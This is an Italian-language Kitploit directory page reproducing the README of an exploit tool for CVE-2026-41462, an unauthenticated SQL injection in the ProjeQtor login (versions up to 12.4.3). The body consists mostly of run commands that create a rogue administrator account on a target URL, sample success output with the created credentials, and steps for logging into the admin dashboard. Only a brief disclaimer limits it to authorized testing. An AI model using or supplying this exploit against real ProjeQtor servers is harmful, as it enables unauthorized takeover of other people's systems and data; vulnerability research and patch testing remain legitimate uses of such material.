Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-41462 — CVE-2026-41462 | Kitploit
Strumenti/GitHubGitHub/0xblackash/cve-2026-41462
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHub0xblackash/cve-2026-41462

CVE-2026-41462

CVE-2026-41462

Vedi Repository
13 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 CVE-2026-41462 - ProjeQtor SQL Injection Non Autenticata

projeqtor_cover

SQL Injection critica non autenticata in ProjeQtor ≤ 12.4.3

Critical CVSS 9.8 Unauthenticated

📌 Panoramica

CVE-2026-41462 è una vulnerabilità critica di SQL Injection non autenticata nella funzionalità di accesso dello strumento di gestione progetti ProjeQtor.

  • ID CVE: CVE-2026-41462
  • Versioni interessate: ProjeQtor 7.0 fino alla 12.4.3
  • Versione corretta: 12.4.4
  • Gravità: Critica (CVSS 9.8)
  • Tipo: SQL Injection impilata non autenticata

🛠️ Sfruttamento

Utilizzo

root@kitploit:~
python3 CVE-2026-41462.py -u http://target.com --create-admin

# With custom credentials
python3 CVE-2026-41462.py -u http://target.com --create-admin \
  --username admin123 --password StrongPass2026!

📊 Cosa Vedrai Se Funziona

Quando l'exploit ha successo, vedrai un output simile a questo:

root@kitploit:~
[+] Targeting: http://target.com
[+] Sending payload to create admin user 'hacker' ...
[+] Request sent successfully.
[+] New admin created → Username: hacker | Password: Admin123!
[+] Try logging in at: http://target.com/login.php

Dopo Aver Eseguito l'Exploit:

  1. Apri il browser e vai su:
    http://target.com/login.php

  2. Accedi utilizzando le credenziali mostrate nell'output dello script.

  3. Se l'accesso riesce, ti ritroverai nella Dashboard Amministrativa di ProjeQtor con pieni privilegi amministrativi.

Indicatori di Successo:

  • Puoi visualizzare tutti i progetti, gli utenti e le impostazioni di sistema
  • Puoi creare/modificare/eliminare progetti senza restrizioni
  • Il nuovo utente appare nella sezione di gestione utenti

📁 Contenuto del Repository

FileDescrizione
CVE-2026-41462.pyScript principale di sfruttamento
CVE-2026-41462.yamlTemplate di rilevamento Nuclei
README.mdQuesta documentazione

🚀 Avvio Rapido

  1. Clona il repository:

    root@kitploit:~
    git clone https://github.com/0xBlackash/CVE-2026-41462.git
    cd CVE-2026-41462
    
  2. Esegui l'exploit:

    root@kitploit:~
    python3 CVE-2026-41462.py -u http://target.com --create-admin
    
  3. Accedi con l'account amministratore appena creato.


⚠️ Disclaimer

Questo strumento è destinato esclusivamente a scopi educativi e test di penetrazione autorizzati. L'uso non autorizzato è illegale.


📄 Riferimenti

  • NVD - CVE-2026-41462
  • Patch ufficiale ProjeQtor (v12.4.4+)

Divulgazione Responsabile • Solo Hacking Etico
Resta al sicuro. Testa legalmente.
Scarica lo strumento